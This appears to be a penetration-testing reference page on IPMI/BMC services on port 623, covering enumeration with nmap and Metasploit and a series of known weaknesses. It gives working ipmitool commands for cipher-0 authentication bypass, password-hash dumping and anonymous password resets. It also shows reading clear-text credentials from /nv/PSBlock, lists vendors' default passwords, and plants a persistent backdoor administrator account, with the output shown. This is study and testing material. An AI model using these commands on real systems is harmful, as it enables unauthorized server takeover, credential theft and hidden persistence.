IPMI - Port 623/UDP/TCP

Basic info

The Intelligent Platform Management Interface (IPMI) is a standardized protocol developed by Intel in 1998 to facilitate remote management and monitoring of computer systems, regardless of their operating state. IPMI operates independently of the system's CPU, firmware, and operating system, enabling administrators to perform tasks such as system monitoring, recovery, and maintenance even when the system is powered off or unresponsive. This functionality is primarily managed through the Baseboard Management Controller (BMC), a dedicated microcontroller embedded on the motherboard.

Default Ports: IPMI commonly utilizes UDP port 623 for network communication, though it can also operate over TCP.

Enumerating IPMI Services

Effective enumeration of IPMI services is crucial for identifying potential vulnerabilities. The following methodologies and tools are instrumental in this process:

Network Scanning with Nmap

Nmap can be employed to detect active IPMI services on a network:

nmap -n -p 623 <target-subnet>
nmap -n -sU -p 623 <target-subnet>

These commands scan the specified subnet for hosts with UDP port 623 open, indicating the presence of IPMI services.

Identifying IPMI Version

Determining the IPMI version can provide insights into potential vulnerabilities:

nmap -sU --script ipmi-version -p 623 <target-ip>

Alternatively, the Metasploit auxiliary module can be utilized:

use auxiliary/scanner/ipmi/ipmi_version

Common IPMI Vulnerabilities

Several vulnerabilities have been identified in IPMI implementations that could be exploited during penetration testing:

Cipher 0 Authentication Bypass

A critical flaw in IPMI 2.0 involves the use of cipher suite 0, which allows authentication bypass. Attackers can exploit this by specifying cipher 0 to gain unauthorized access:

ipmitool -I lanplus -C 0 -H <target-ip> -U <username> -P <password> user list

This command lists user accounts without proper authentication, highlighting the severity of the vulnerability.

Retrieval of Password Hashes via RAKP

The Remote Authenticated Key-Exchange Protocol (RAKP) in IPMI 2.0 contains a vulnerability that permits attackers to retrieve password hashes of valid users. These hashes can then be subjected to offline brute-force attacks to recover plaintext passwords. Metasploit provides a module to exploit this vulnerability:

use auxiliary/scanner/ipmi/ipmi_dumphashes

Successful execution retrieves hashed credentials, emphasizing the need for robust password policies.

Anonymous Authentication

Some IPMI implementations allow anonymous authentication with null usernames and passwords. This misconfiguration can be exploited to perform unauthorized actions, such as resetting user passwords:

ipmitool -I lanplus -H <target-ip> -U '' -P '' user set password <user-id> <new-password>

This command resets the password for the specified user ID without proper authentication.

Clear-Text Password Storage in Supermicro BMCs

Supermicro's IPMI implementation has been found to store administrator credentials in clear text within the BMC's filesystem, specifically in files like /nv/PSBlock. Attackers with access to the BMC can retrieve these credentials:

cat /nv/PSBlock

This practice poses significant security risks and underscores the importance of securing BMC access.

Brute Force

HP randomizes the default password for its Integrated Lights Out (iLO) product during manufacture. This practice contrasts with other manufacturers, who tend to use static default credentials. A summary of default usernames and passwords for various products is provided as follows:

• HP Integrated Lights Out (iLO) uses a factory randomized 8-character string as its default password, showcasing a higher security level.

• Products like Dell's iDRAC, IBM's IMM, and Fujitsu's Integrated Remote Management Controller use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively.

• Similarly, Supermicro IPMI (2.0), Oracle/Sun ILOM, and ASUS iKVM BMC also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords.

Introducing Backdoors into BMC from the Host

Upon compromising a host equipped with a BMC, the local BMC interface can be leveraged to insert a backdoor user account, creating a lasting presence on the server. This attack necessitates the presence of ipmitool on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS.

bash

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR